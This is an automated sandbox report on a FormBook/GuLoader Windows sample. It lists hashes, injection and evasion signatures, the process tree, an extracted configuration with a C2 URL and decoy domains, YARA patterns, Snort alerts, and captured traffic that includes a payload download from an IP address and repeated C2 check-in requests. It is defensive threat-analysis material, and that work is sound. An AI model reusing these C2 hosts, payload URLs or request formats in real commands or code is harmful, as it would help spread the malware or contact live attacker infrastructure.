
Windows Analysis Report
jU0hAXFL0k.exe

Overview

General Information

Sample Name:jU0hAXFL0k.exe
Analysis ID:1326341
MD5:6e8215eee3034d6dcf18d79d397e5715
SHA1:5612bff0830a9a025eb35cf7c054d2062745d1b9
SHA256:ac4761c259daede4b4efb78816c98fb56344e381bb56d69ea897c30c9899bf39

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • jU0hAXFL0k.exe (PID: 6044 cmdline: C:\Users\user\Desktop\jU0hAXFL0k.exe MD5: 6E8215EEE3034D6DCF18D79D397E5715)
    • jU0hAXFL0k.exe (PID: 8580 cmdline: C:\Users\user\Desktop\jU0hAXFL0k.exe MD5: 6E8215EEE3034D6DCF18D79D397E5715)
      • explorer.exe (PID: 4928 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • autofmt.exe (PID: 6440 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: ABC9F7DAB410FE452D2D90C9960077BE)
        • cmd.exe (PID: 9200 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 8460 cmdline: /c del "C:\Users\user\Desktop\jU0hAXFL0k.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup
Malware Configuration

{"C2 list": ["www.nightoracle.com/rs10/"], "decoy": ["starryallure.com", "mania-31.online", "baba-bt-top1.buzz", "jwilkinsartscapeinc.com", "tallerhazop.com", "lulu013.com", "pontoimediato.com", "stmc-company.com", "thesoftwarepractitioner.com", "makemoneywithsherrie.com", "algaroba.com", "smartbookmarks.info", "burneysaw.com", "fftsxxx.top", "hvr998.com", "sofisticars.store", "clickit.fun", "couches-sofas-16683.bond", "ikkasolutions.com", "oakvisa.com", "totalkfood.com", "guillaumecarreau.com", "biomagnetismocolombia.com", "jrszhiboz.com", "rewmio.xyz", "willowliy.com", "calm-plants.com", "robertjamesfineclothing.com", "wgardsgm.live", "dngbdk9jpusxpwr.com", "slycepicklegear.com", "mtauratarnt.com", "simolified.com", "mekkamochi.com", "deeprootedleader.com", "container-houses-vn.click", "roundaboutlogistics.com", "m-baer.com", "electric-cars-19095.bond", "destinydinos.com", "taxretentionstrategiesgroup.com", "zg9tywlubmftzw5ldzi0mdm.com", "cleaning-products-29334.bond", "metaastrologia.com", "practicaloutsource.com", "w1nb74.top", "just-one.info", "cryptarrow.com", "omarshafie.online", "latitudeinformatics.com", "fhstbanknigeria.com", "hdlive7.live", "laserhairremovalkit.com", "into-org.com", "kzjsm.com", "juara102-azura.com", "digitsum.com", "cabins-prefab.online", "allisonparlinart.com", "cpsgrantstream.com", "everythingbutthetruck.com", "w6k3v.com", "alfarizkigrup.com", "gs3ekdj3ixe.asia"]}
Yara Matches

Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
    Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      No Sigma rule has matched
      Snort IDS alerts (timestamp, source -> destination, protocol, SID, classtype):
      10/16/23-11:30:34.341610  192.168.11.30:50130 -> 23.227.38.74:80     TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:32:59.120800  192.168.11.30:50138 -> 3.33.130.190:80     TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:31:15.754112  192.168.11.30:50133 -> 23.227.38.74:80     TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:29:13.108417  192.168.11.30:50127 -> 104.21.19.227:80    TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:29:33.045985  192.168.11.30:58176 -> 1.1.1.1:53          UDP  SID 2023883  Potentially Bad Traffic
      10/16/23-11:34:01.586007  192.168.11.30:50142 -> 104.247.82.51:80    TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:31:36.580336  192.168.11.30:50134 -> 66.96.162.133:80    TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:34:22.055359  192.168.11.30:50146 -> 208.91.197.27:80    TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:34:44.313076  192.168.11.30:50147 -> 172.67.210.176:80   TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:31:57.444382  192.168.11.30:50135 -> 104.247.82.90:80    TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:29:52.922186  192.168.11.30:50129 -> 103.224.212.210:80  TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:33:40.532597  192.168.11.30:50141 -> 172.67.193.177:80   TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:29:33.638445  192.168.11.30:50128 -> 172.67.148.68:80    TCP  SID 2031412  A Network Trojan was detected
      10/16/23-11:27:46.501036  192.168.11.30:50125 -> 103.72.68.128:80    TCP  SID 2855192  A Network Trojan was detected


      AV Detection

      Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook (same configuration as extracted above)
      Source: jU0hAXFL0k.exe, Virustotal: Detection: 45%
      Source: jU0hAXFL0k.exe, ReversingLabs: Detection: 31%
      Source: Yara match, File source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara match, File source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: jU0hAXFL0k.exe, Avira: detected
      Source: http://www.fftsxxx.top/rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe, Avira URL Cloud: Label: phishing
      Source: http://103.72.68.128/pcd/zkltfDHOiVw63.bin, Virustotal: Detection: 12%
      Source: jU0hAXFL0k.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: jU0hAXFL0k.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb, source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP, source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb, source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe
      Source: Binary string: mshtml.pdbUGP, source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cmd.pdb, source: cmd.exe
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, Code function: 5_2_004062DD FindFirstFileA,FindClose,5_2_004062DD
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, Code function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,5_2_004057A2
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exe, Code function: 5_2_00402765 FindFirstFileA,5_2_00402765
      Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_00D7589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00D7589A
      Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_00D74EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00D74EC1
      Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_00D83E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00D83E66
      Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_00D70207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00D70207
      Source: C:\Windows\SysWOW64\cmd.exe, Code function: 15_2_00D6532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00D6532E
      Source: C:\Windows\SysWOW64\cmd.exe, Code function: 4x nop then pop edi, 15_2_02DE6CEB

      Networking

      Source: C:\Windows\explorer.exe, Network Connect: 103.224.212.210 80
      Source: C:\Windows\explorer.exe, Network Connect: 172.67.193.177 80
      Source: C:\Windows\explorer.exe, Network Connect: 23.227.38.74 80
      Source: C:\Windows\explorer.exe, Network Connect: 208.91.197.27 80
      Source: C:\Windows\explorer.exe, Network Connect: 66.96.162.133 80
      Source: C:\Windows\explorer.exe, Network Connect: 104.21.19.227 80
      Source: C:\Windows\explorer.exe, Network Connect: 172.67.210.176 80
      Source: C:\Windows\explorer.exe, Network Connect: 104.247.82.51 80
      Source: C:\Windows\explorer.exe, Network Connect: 172.67.148.68 80
      Source: C:\Windows\explorer.exe, Network Connect: 3.33.130.190 80
      Source: C:\Windows\explorer.exe, Network Connect: 104.247.82.90 80
      Source: Traffic, Snort IDS: 2855192 ETPRO TROJAN GuLoader Encoded Binary Request M2 192.168.11.30:50125 -> 103.72.68.128:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50127 -> 104.21.19.227:80
      Source: Traffic, Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.11.30:58176 -> 1.1.1.1:53
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50128 -> 172.67.148.68:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50129 -> 103.224.212.210:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50130 -> 23.227.38.74:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50133 -> 23.227.38.74:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50134 -> 66.96.162.133:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50135 -> 104.247.82.90:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50138 -> 3.33.130.190:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50141 -> 172.67.193.177:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50142 -> 104.247.82.51:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50146 -> 208.91.197.27:80
      Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.30:50147 -> 172.67.210.176:80
      Source: Malware configuration extractor, URLs: www.nightoracle.com/rs10/
      Source: Joe Sandbox View, ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU
      Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
      Source: global traffic, HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=aZ/lcGP+1FkvlwdkDULp+PnMy+vqJpYUHhxtLH0JyJK/Dwy50YtC4wzl69ZsBTKZeIRM HTTP/1.1 | Host: www.juara102-azura.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?wr5xXxu=0iJ8M3XqpMfSbPzaPESpQVivP40tWom07G4vKfCAiNjWSIJ0IxOBhHolE1vkpwp+8Hu6&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.fftsxxx.top | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=SxqHGPQaAl7yFZn58Kwa4D8rXi7vUXAn+pZ+h1ux2Xs7o9rzQOK5UHTSqMwI3eALG/2g HTTP/1.1 | Host: www.nightoracle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=Jl6D3AYJMpsoqEFrbY4lXgI+CqA8jAhhEBHBOp3JwZxwH/kCFGDnFMsoz66PDEG/ZKuf HTTP/1.1 | Host: www.thesoftwarepractitioner.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=uoL10Qcd0eLYS7Ve2hB0LYPAWS6gq5lEHn4a3bybbvdgEh6IH9sFuMB9DUK4ZLPCWxvn HTTP/1.1 | Host: www.laserhairremovalkit.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.omarshafie.online | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=KT0d1e3BBcKFYE425gVaQdIZfgENHgjmY2M2c9Bsa4V4Og8kkivQcwUvXP4wlMvPRBCl HTTP/1.1 | Host: www.electric-cars-19095.bond | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.latitudeinformatics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.hdlive7.live | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=h9cyBphf9TZy/NiZOY7V20wqq+uuKxDlnXh3oTW0sJJqbjikvIbKCSguXowJmn7XnCFt HTTP/1.1 | Host: www.robertjamesfineclothing.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?wr5xXxu=tnlFoTupmPEe2FuJuv6YyFNcBynACc4EqLKIKpHaKJfweHMHroc5yQmaieiVC2idvHp8&CZF=FZ4P3Z3Pkfe HTTP/1.1 | Host: www.practicaloutsource.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: global traffic, HTTP traffic detected: GET /rs10/?wr5xXxu=pPtLjK/UsFcChRXxT0x+WEjNRlgjs/QTeyWPHt+QyMOk/3bi5sdkKHli51cvqOL5Mhkn&L0Dp=Ifmdxb8 HTTP/1.1 | Host: www.mtauratarnt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
      Source: Joe Sandbox View, IP Address: 103.72.68.128
      Source: Joe Sandbox View, IP Address: 23.227.38.74
      Source: global traffic, HTTP traffic detected: GET /pcd/zkltfDHOiVw63.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 | Host: 103.72.68.128 | Cache-Control: no-cache
      Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 16 Oct 2023 09:29:34 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ES6qWQ3CPXdPIdfdI9zYyCmb73rUtvrX%2F%2Fnyne9bZeX5Xn3hRgtL2LEh0mhaStAWviGkhpGZn44kD1Ih%2BhMvRsXuTZQsUxSwjiIjux%2FE3lyO1sDkR8wGr9QYNoB7ruoVn24%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 816f4731cb992f35-LAX | alt-svc: h3=":443"; ma=86400 | Data Ascii: 4bf<!DOCTYPE html><html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width" /> <title>404: This page could not be found</title> </head> <body> <script rel="nofollow" language="javascript" type="text/javascript" src="/Aquery.js"></script>
      Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 16 Oct 2023 09:30:34 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 4517 | Connection: close | X-Frame-Options: SAMEORIGIN | Referrer-Policy: same-origin | Cache-Control: max-age=15 | Expires: Mon, 16 Oct 2023 09:30:49 GMT | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EwDGESFM00gACgrIKYzV%2Bi6Ot6dcvfzCh4HacvjyBdTdtZN1kUc4p7nogLAy%2BThEuU9M%2FizgXBKpSmchVSmw%2BDiMQ8FveVHe9lz7cA%2F04pOsdC64Vx58BzrdnZXzGIYv4M52rNTkiGnp6rpjkBZFlLY%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} | Server-Timing: cfRequestDuration;dur=11.000156 | Server: cloudflare | CF-RAY: 816f48ad2f172ac3-LAX | alt-svc: h3=":443"; ma=86400 | Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="rob
      Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 16 Oct 2023 09:31:15 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 4517 | Connection: close | X-Frame-Options: SAMEORIGIN | Referrer-Policy: same-origin | Cache-Control: max-age=15 | Expires: Mon, 16 Oct 2023 09:31:30 GMT | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MpGK7yZXHWUiYzLtGfchwAQaLzfuKq2WwxungnaqY4dClZ6lkG9HFkWgqR7PcaKKJRzGf8Y5%2BTSWuo90pIrRTe%2FUdCQXbWcMIyE%2FCa44ONOFBWnb3JDYxWv7HtMUKB7OG8CJp%2FRF3wt%2FVEsalg%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} | Server-Timing: cfRequestDuration;dur=7.999897 | Server: cloudflare | CF-RAY: 816f49aff84a5220-LAX | alt-svc: h3=":443"; ma=86400 | Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots
      Source: global traffic, HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Mon, 16 Oct 2023 09:31:57 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: openresty | Date: Mon, 16 Oct 2023 09:32:59 GMT | Content-Type: text/html | Content-Length: 291 | Connection: close | ETag: "65271109-123" | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
      Source: global traffic | HTTP traffic detected (2 identical responses): HTTP/1.1 403 Forbidden | Server: nginx | Date: Mon, 16 Oct 2023 09:34:01 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
      Source: global traffic | HTTP traffic detected (2 identical responses): HTTP/1.1 403 Forbidden | Date: Mon, 16 Oct 2023 09:34:22 GMT | Server: Apache | Content-Length: 302 | Content-Type: text/html; charset=UTF-8 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 61 72 63 68 69 76 65 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 62 6f 74 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 61 6c 69 67 6e 3d 63 65 6e 74 65 72 3e 0d 0a 3c 68 33 3e 45 72 72 6f 72 2e 20 50 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 64 69 73 70 6c 61 79 65 64 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 65 72 76 69 63 65 20 70 72 6f 76 69 64 65 72 20 66 6f 72 20 6d 6f 72 65 20 64 65 74 61 69 6c 73 2e 20 20 28 33 35 29 3c 2f 68 33 3e 0d 0a 20 20 20 20 3c 21 2d 2d 2d 20 31 30 32 2e 31 32 39 2e 31 34 35 2e 33 32 2d 2d 2d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta name="robots" content="noarchive" /><meta name="googlebot" content="nosnippet" 